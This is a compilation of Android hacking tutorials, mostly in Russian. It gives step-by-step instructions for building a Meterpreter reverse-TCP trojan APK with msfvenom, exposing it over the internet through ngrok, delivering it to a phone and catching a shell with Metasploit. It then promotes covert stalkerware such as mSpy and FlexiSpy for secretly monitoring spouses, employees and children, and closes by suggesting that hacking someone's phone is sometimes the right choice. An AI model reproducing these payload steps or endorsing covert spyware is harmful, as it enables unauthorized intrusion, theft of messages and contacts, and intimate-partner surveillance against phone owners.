Kali linux взлом android

Краткое руководство: Как взломать андроид с Kali Linux

Предпосылки для взлома Android

Шаги для взлома Android

1. Создать Payload

Чтобы создать троян для взлома Android, нам нужно создать полезную нагрузку, используя утилиту msfvenom в Kali Linux.

В приведенной выше команды LHOST задан IP, используется в команде ifconfig от Kali Linux.

Вышеуказанная команда создает троянский файл apk, который будет установлен на целевой телефон для использования, однако перед этим мы должны подписать этот apk для правильной установки. Следуйте шагам ниже по списку для этого.

а. Создание хранилища ключей:

Выше команда спрашивает вопросы и пароль.

б. Подписать созданный файл с помощью jarsigner apk.

с. Проверьте apk, созданный с помощью jarsigner.

д. Оптимизация файла с помощью zipalign apk.

Перед тем как начать работу, установите zipalign с помощью команды ниже:

Теперь позвольте оптимизировать apk.

Таким образом, наш окончательный apk, который мы используем для взлома андроида назван как «my0704_sign.apk».

2. Запустите msfconsole на Kali Linux для эксплуатации телефона Android.

В приведенной выше строке msf запустить полезную нагрузку на андроид и мультиобработчик команд exploit с помощью ниже:

В команде ниже мы используем IP Kali Linux, может быть взят с помощью команды ifconfig на Kali Linux. Кроме того, мы используем номер порта 4444 для эксплуатации.

А затем, наконец, использовать команду, которая будет ждать исполнения apk на телефоне Android.

Выполнение apk на андроиде.

Здесь мы используем Android эмулятор предоставленный Google. Следовательно , вам необходимо загрузить образ ISO с сайта Google.

После загрузки вы можете создать нормальную виртуальную машину VMware и смонтировать этот ISO на виртуальной машине, чтобы запустить виртуальную машину машину. Настройка Android VM с помощью id gmail.

Источник

Hacking Android Remotely (WAN) using Kali Linux

The complete tutorial can be seen on ehacking blog here.

Usually in WAN, first you need to have a Static IP/Hostname and second you need to do Port Forwarding to allow your traffic transmission, and we all know that both are so difficult in real time as we have limited access to ports in a network.

So, what we will do in this scenario, we will setup a secure tunnel using Ngrok.

Ngrok is a tunneling reverse proxy system that establishes tunnels from public endpoint i.e. an internet to a locally running network service. This can help us to create a public HTTP/HTTPS URL for a website running locally in our machine. We don’t need to do any kind of port forwarding while using Ngrok and our network service will eventually expose to the internet with the help of TCP tunneling.

Step by Step Demo:

Step 01: Create an account on Ngrok to download

First you need to install Ngrok in your Kali machine.

Fire up Kali, and browse Ngrok to access its official website: https://ngrok.com/

You have to make an account first. Go to signup option and fill all the necessary fields.

(CAUTION: Do not use your work email or an email that has access to your private information. It is a best practice to use temporary emails while performing penetration testing. You can also use https://temp-mail.org/en/ to create your account)

After signing up, you can download ngrok installer for Linux.

Step 02: Unzip the downloaded file

Go to Download directory where your downloaded file resides.

You have to unzip this file. Use unzip command to extract the file.

Step 03: Copy the token, given to your account

After unzipping, you have to save the token that was given to your account.

Copy the token from here and paste it in your terminal. Make sure to paste the token in a same directory where you have ngrok.

You are all set to use this tool. Type in terminal:

# ./ngrok tcp [Port no:] (choose any port number on which you want to bind a connection)

The forwarding here specifies the TCP tunnel which ngrok has created. The connection has bind to localhost at port 4242. Now we need to generate a malicious payload by using msfvenom.

Step 04: Generate a payload by using msfvenom

# msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10900 R > /root/Desktop/android.apk

Step 05: Start reverse TCP handler

Set exploit as multi/handler, Lhost as localhost i.e 0.0.0.0, Lport as 4242 and run exploit.

Step 06: Download the payload on your android phone to get a meterpreter session

To download this payload on android device we will upload it on www.upload.ee, a very useful website to upload your files securely & anonymously .

Browse this link on your android phone, it will download the zip file of our payload. Unzip it and install it in your phone. (allow option to install it from third party sources)

After installing and running the app from my android phone, I got a session in my Kali attacking machine.

That is how you can actually exploit an android phone and gain access remotely over the internet rather than on your local area network. After getting a session you know that an attacker can easily get your info, steal your contacts, messages, app data and many more. So, gaining access of your phone is that much easier when you don’t have awareness.

This exploit is tested on Android version 9.0, which is not an old version and currently in use by many users. A healthy tip to secure your Android device is to not install any application from an unknown source, even if you really want to install it, try to read and examine its source code to get an idea whether this file is malicious or not.

Источник

Этичный хакинг с Михаилом Тарасовым (Timcore)

Блог об Этичном Хакинге

#2 Хакинг Android — Получение доступа к Android с помощью Meterpreter.

Здравствуйте, дорогие друзья.

Давайте взломаем нашу машину на Android с помощью пэйлоада, который мы создадим, используя MSFVenom. Это будет нашей первой атакой на девайс.

Для реализации данной атаки нам понадобятся две машины – это Kali Linux, и Android. Первое, что мы сделаем – это проверим ip-адрес машины на Kali, с помощью команды «ifconfig»:

Зная ip-адрес, мы сможем сгенерировать пэйлоад для Aндройд-девайса.

Перейдем на Рабочий стол Kali:

Далее, запустим MSFVenom, где команда будет выглядеть как: «msfvenom–pandroid/meterpreter/reverse_tcpLHOST=192.168.0.127 LPORT=5555 –o shell.apk»:

Жмем клавишу «Enter», и начинаем процесс генерации пэйлоада:

Попутно запустим веб-сервер «Apache», с помощью команды: «sudo service apache2 start»:

Теперь нам необходимо перенести сгенерированный пэйлоад с рабочего стола в директорию веб-сервиса. Команда будет выглядеть как: «mv shell.apk /var/www/html/»:

Проверим, все ли мы правильно сделали, перейдя в директорию веб-сервера:

Следующим шагом нам нужно будет запустить Metasploit Framerwork, с помощью команды: «msfconsole»:

Переходим в наш Андройд-девайс, запустив Гугл Хром, для того, чтобы перейти по адресу нашего веб-сервера на Kali:

Теперь нам нужно загрузить шелл на Андройд. Переходим по адресу: «192.168.0.127/shell.apk»:

Жмем кнопку «Ok», и скачиваем файл:

Далее щелкаем по кнопке «Open», и у нас появляется всплывающее окно с правами доступа в операционной системе (например, доступ к записи аудио и доступу к контактам):

Жмем кнопку «Next», и у нас появляются дополнительные опции доступа:

Кликаем по кнопке «Install», и производится инсталляция. Через некоторое время мы получаем дополнительное всплывающее окно, где жмем кнопку «Install Anyway»:

И это последний шаг установки шелла. Снова появляется предупреждение, которое мы игнорируем:

Щелкаем по кнопке «Don’t Send», и далее пока не открываем пэйлоад:

Переходим в терминал Kali Linux, с уже открытым инструментом Metasploit Framework. Нам нужно настроить прослушиватель подключения.

Это делается в несколько шагов. Первая команда: «use exploit/multi/handler»:

Далее выбираем пэйлоад с помощью команды: «set payload android/meterpreter/reverse_tcp»

Далее прописываем хост и порт для приема соединения:

Прописываем команду «run», в машине на Андройд жмем кнопку «Open»:

В Андройд-девайсе ничего не происходит, но если мы перейдем в Kali Linux, то увидим открывшуюся сессию Meterpreter-a:

Можем поиграться, и посмотреть пользователя, под которым мы находимся в системе. Это команда «getuid»:

С помощью команды «help», можно увидеть список команд, которые можно использовать на Андройде:

Покопайтесь в командах. Здесь можно найти много всего интересного.

Источник

Справочник хакера Android 101 | Как взломать телефон / планшет Android удаленно

Последнее обновление 16 сентября 2021 г. Ян Макьюэн

Взлом Android

Когда дело доходит до взлом телефонов / планшетов Android, вам может сначала прийти в голову сложное кодирование и загадочные хакерские уловки. На самом деле, будучи сторонним наблюдателем, вы, возможно, никогда не знаете толк в тонкостях как удаленно взломать телефон Android.

Поэтому, чтобы помочь вам решить проблему удаленного взлома Android, мы рассмотрим использование автоматический шпионский инструмент со всей важной информацией, необходимой для взлома Android. Кроме того, если вы хотите глубже изучить этот вопрос, вы найдете вдохновение в использование Kali Linux и других методов кодирования рассекаем ниже.

Что ж, надежные инструменты шпионажа и сложные уловки кодирования — отличные решения для удаленного взлома телефонов Android, однако оба обладают уникальными качествами, которые делают их подходящими для разные ситуации и уровень знаний.

Итак, если вы хотите узнать, что вам больше подходит, просто читайте дальше, чтобы узнать, как лучше всего взломать телефон Android.

Содержание

Удаленный взлом Android из веб-браузера — используйте приложение-шпион

• Работает на всех моделях телефонов и планшетов Android
• Применяется к Android 4 и выше, включая последнюю версию Android 12.
• Взломать Android удаленно

Использование готового шпионского приложения — менее сложный метод взлома Android. И это нужно попробовать в первую очередь.

Однако, поскольку использование шпионских приложений намного проще, чем другие хакерские методы со сложной конфигурацией и кодированием, вы можете задаться вопросом: действительно ли шпионские приложения являются полезным способом взломать Android удаленно, или они просто способ потратить ваши деньги на автоматическая подписка?

Итак, прежде чем отправиться в взлом Android с помощью шпионского приложения, давайте узнаем, как это работает и на что способно.

Что можно сделать с телефоном Android с ошибками с помощью приложения Spy Phone

1. Полный доступ к файлам и данным на целевом Android, как и на устройстве.

Когда Android взломан шпионским приложением, вы можете получить доступ и загрузить буквально ВСЕ на целевой телефон, включая, но не ограничиваясь:

• Журналы вызовов
• Текстовые сообщения
• Контакты
• закладки
• Фото
• Видео
• Установленное приложение
• и т.д

2. Запись и перехват звонков в режиме реального времени.

Некоторые шпионские приложения, такие как знаменитые Flexispy, может контролировать телефонные звонки в прямом эфире и VoIP-звонки, такие как Facebook Messenger, Hangout, Skype, LINE, Viber, WhatsApp и многие другие в режиме реального времени без ведома жертв. Некоторые гении из FlexiSpy также предлагают вам выбрать, какие числа слушать.

3. Отслеживайте онлайн-активность.

Предположим, вы шпионите за телефоном Android с помощью приложения, затем вы сидите за приборной панелью, проверяете и отслеживаете любую активность, которая вот-вот должна произойти, в том числе:

• История браузера, в том числе История инкогнито
• Приложение для социальных сетей: YouTube, Instagram, Facebook, Messenger, Twitter, Snapchat, WhatsApp, Tik Tok и т. Д.
• кейлоггер: Введите информацию, особенно конфиденциальные сообщения или пароли.
• И т.д

Шпионское приложение вроде mSpy также предлагает Сроки обо всех действиях вашего телефона, чтобы вы всегда могли сразу узнать, что происходит.

4. Отслеживание местоположения по GPS и установка геозон.

Вы можете узнать, где кто-то был, и отследить местоположение затронутого Android-устройства в любой момент по карте. С помощью предупреждений о местоположении вы также можете настроить геозону от 50 метров до 10 км. Если неисправный телефон Android выдвинется или окажется на определенном расстоянии от местоположения, которое вы указали на панели управления, вы получите предупреждения от шпионского приложения.

Как работает шпионское приложение для удаленного взлома телефона / планшета Android

Большинство шпионских приложений работают как на телефонах, так и на планшетах. Вы можете отслеживать все действия и получать доступ к любым файлам на целевом устройстве с помощью панели управления на экране телефона или компьютера сразу после установки приложения на телефон или планшет Android, которые вы хотите взломать.

Установка выполняется один раз и займет всего несколько минут. Никакого рутирования не требуется. Тогда приложение заработает в скрытом режиме и не может быть найден ни в коем случае.

Как удаленно взломать телефон Android с помощью шпионского приложения

Поскольку большая часть шпионских приложений на рынке работает примерно так же, мы резюмируем три общих шага, которые вы можете выполнить для удаленного взлома Android.

Шаг 1. Создайте аккаунт

Вам необходимо зайти на официальный сайт шпионского приложения и зарегистрировать аккаунт. (Большинство шпионских приложений предлагают бесплатную пробную версию. В противном случае вы также имеете право на получение полного возмещения в течение 7–30 дней.)

Шаг 2. Подключитесь к целевому Android.

После создания премиум-аккаунта вы получите электронное письмо, содержащее регистрационный код, а также подробное руководство о том, как установить приложение и как выполнить необходимые настройки.

Шаг 3. Начните взламывать

Когда все будет готово, вы можете проверить панель управления шпионским приложением из веб-браузера.

Список лучших хакерских инструментов для удаленного взлома телефона Android

В Интернете есть множество инструментов шпионажа. Если вы думаете, что у вас есть голова вокруг всего этого, когда вы выбираете правильное бесцельно, не беспокойтесь, мы уже протестировали более 100+ приложений и выбрали некоторые из лучших, которые предоставляют обещанные функции и взламывают Android удаленно, как один из этих продуктов с самым высоким рейтингом:

Лучшее соотношение: mSpy

Что ж, лучший инструмент для взлома Android для большинства людей зависит от того, сколько вы готовы заплатить, но mSpy достигает хорошей золотой середины по цене 48.99 долларов в месяц — немного больше, чем у бюджетных брендов, но все же доступно и значительно дешевле, чем профессиональные инструменты взлома Android.

mSpy имеет мощные функции взлома, удобную панель управления для мониторинга и управления онлайн-активностью в зависимости от ваших потребностей. Приобретая mSpy, вы получаете подробный мастер установки с вашими учетными данными, чтобы вы могли начать работу, а также круглосуточную бесплатную многоязычную персонализированную техническую поддержку.

Лучший комплексный вариант: Spyzie

Благодаря множеству функций взлома, Spyzie предоставляет вам наиболее полное решение для удаленного взлома Android. Это может помочь получить полный доступ к любому файлу на Android, от фотографий / видео до обмена мгновенными сообщениями, таких как WhatsApp, Snapchat, Viber, Facebook и т. Д., Круглосуточно отслеживая все действия на телефоне Android в режиме реального времени.

Как одно из самых незаметных приложений для Android-шпионских телефонов на рынке, вы не будете разочарованы. Он может незаметно работать в фоновом режиме, не разряжая аккумулятор и не замедляя работу Android. Его простая и понятная панель управления также гарантирует, что его можно легко и эффективно установить и использовать.

Лучшая цена: FamiSafe 9.9 $ / месяц

Спросите о лучших брендах программного обеспечения для восстановления мобильных данных, и кто-то почти наверняка поднимет вопрос о Wondershare. Но они сделали Инструмент для взлома Android (FamiSafe) также. С ежемесячным тарифным планом за 9.99 долларов США вы можете одновременно контролировать до 5 устройств с полным набором функций. Его 7-дневная гарантия возврата денег короче, чем у многих других шпионских приложений, но о цене на производительность трудно сказать «нет».

Лучший Android File Hacker: uMobix

Глобальная пандемия идет полным ходом, и люди все больше времени проводят на своих телефонах. Если вы ищете приложение для шпионского телефона, которое поможет вам проверить, что происходит с целевым телефоном, и сохранить копию файла с Android, вы не захотите пропустить uMobix.

Этот продвинутый хакер для Android может легко собирать доказательства наглядно. Вы можете сидеть и проверять фотографии, видео, текстовые сообщения, закладки, заметки, календари, вложения этих приложений для обмена сообщениями и т. Д., Которые автоматически отправляются с целевого Android в ваше пользовательское пространство в хронологическом порядке.

Лучший GPS-трекер: Cocospy

Cocospy идеальный GPS-трекер. Как и многие из перечисленных здесь шпионских приложений, которые предлагают взлом файлов Android, Cocospy также специально разработан для отслеживания текущего и прошлого местоположения в режиме реального времени. Его можно использовать для указания точки на карте как наблюдаемой или запрещенной. Таким образом, вы можете получать оповещения, когда целевой Android входит или покидает место. Как подсказывают функции Geofence, Cocospy — это настоящий телефонный трекер для всех этих шпионских приложений.

Лучший монитор экрана: pcTattletale

Если вы изучаете, как взломать экран телефона Android, вы, вероятно, уже слышали о pcTattletale, который помогает работодателям, родителям и супругам взламывать экранные действия целевого Android, точно так же, как просмотр онлайн-видео каждого нажатия или щелчка. Самое главное, вы можете контролировать экран в режиме реального времени из любого места в любое время. Просто выньте свой телефон или компьютер, чтобы посмотреть прямую трансляцию.

Лучший телефонный перехватчик: Flexispy

Flexispy почти в отдельной категории. В отличие от другого приложения для шпионских телефонов в этом списке, которое в основном сосредоточено на сборе данных, FlexiSpy может включите микрофон Android и запишите его окружение удаленно. Маркетинг FlexiSpy больше нацелен на отслеживание сотрудников, но родители и любовники также могут найти много чего использовать, особенно если вы ищете способ прослушивать и записывать телефонные звонки в реальном времени или звонки VoIP в скрытом режиме.

Теперь вы можете попробовать эти лучшие шпионские приложения для удаленного взлома телефонов Android через веб-браузер.

Старшие решения для взлома мобильных данных Android (более сложный)

Хакерские уловки могут похвастаться удаленным доступом к телефону Android. Однако эти методы мало что значат для обычных пользователей.

1. Взломайте телефон Android удаленно с помощью Kali Linux (Kali не для новичков)

Kali Linux — одна из самых популярных операционных систем на основе Debian для взлома Android этическими хакерами. Одна из причин заключается в том, что в Kali так много инструментов (более 600), и их можно полностью настроить. В основном он используется для тестирования расширенного проникновения, анализа сетей или исследования безопасности. Просто из-за гибкости этой ОС ей нужна хорошая база знаний для настройки и управления пакетом Kali Linux в соответствии с вашими потребностями.

Нужна Kali Linux для удаленного взлома Android, если вы мало знаете о языках программирования C, C ++, Python или Perl? Вам лучше подумать дважды.

2. Взломать Android-устройство с помощью ADB (Android Debug Bridge)

Android Debug Bridge — это универсальный инструмент командной строки, предназначенный для взаимодействия разработчиков с устройствами Android.

Подобно каналу, ADB позволяет хакерам получить доступ к устройству Android через платформу Ghost.

Для взлома Android-устройства с помощью ADB вам потребуются:

• Компьютер с установленным клиентом ADB
• Стабильное интернет-соединение
• Сервер отладки Android на целевом телефоне должен быть включен

Когда все эти требования соблюдены, вы можете запустить ADB в системе, найти и взломать уязвимое устройство Android с включенным сервером отладки.

3. Взломайте телефон Android, отправив SMS со ссылкой.

Похоже, неплохо было бы отправить фишинговую ссылку на Android жертвы с помощью SMS и взломать. Однако осуществимость этого метода невысока. Во-первых, вам нужно знать, как создать и разместить фишинговую страницу, что может занять несколько дней, если вы только начинаете. Даже если вам это удастся, вы должны убедиться, что жертва переходит по ссылке. Но в наше время никто не перейдет по подозрительной ссылке в сообщении с неизвестного номера телефона. Так что взламывать Android с помощью фишинговых ссылок однозначно не рекомендуется.

Заключение: Приложение Spy Phone — лучший способ удаленно взломать Android

И приложение для шпионского телефона, и трюки для программирования могут удаленно взломать Android. Однако привлекательные особенности приложения Spying делают его более чем достаточно просто чтобы собрать то, что вам нужно, с Android. Одна вещь, которую вы быстро узнаете с помощью шпионского приложения, — это то, насколько оно может быть удобным, когда вы открываете веб-панель управления на своем компьютере или телефоне и обнаруживаете такие универсальные функции, как взлом файлов, прослушивание телефонных звонков, отслеживание местоположения и т. Д. .

Если вы не хотите изучать язык программирования с самого начала, просто зайдите и настройте шпионское приложение в течение нескольких минут, без необходимости рутирования, тогда приложение автоматически запустится в скрытом режиме и отправит информацию в ваше пользовательское пространство для вы можете проверить в любой момент. Вот как должен выглядеть взлом Android.

ВНИМАНИЕ: Содержимое здесь предназначено только для образовательных целей. Любое незаконное поведение с использованием вышеупомянутых хакерских инструментов не приветствуется.

Часто задаваемые вопросы: Правовой риск: законно ли взломать чей-то телефон Android?

Думаю, ты уже знаешь ответ. Но подумайте о безопасности своих детей, находящихся под угрозой взаимоотношений или своих неверных сотрудников. Вы сделаете правильный выбор. Иногда лучше всего взломать чей-то телефон.

Источник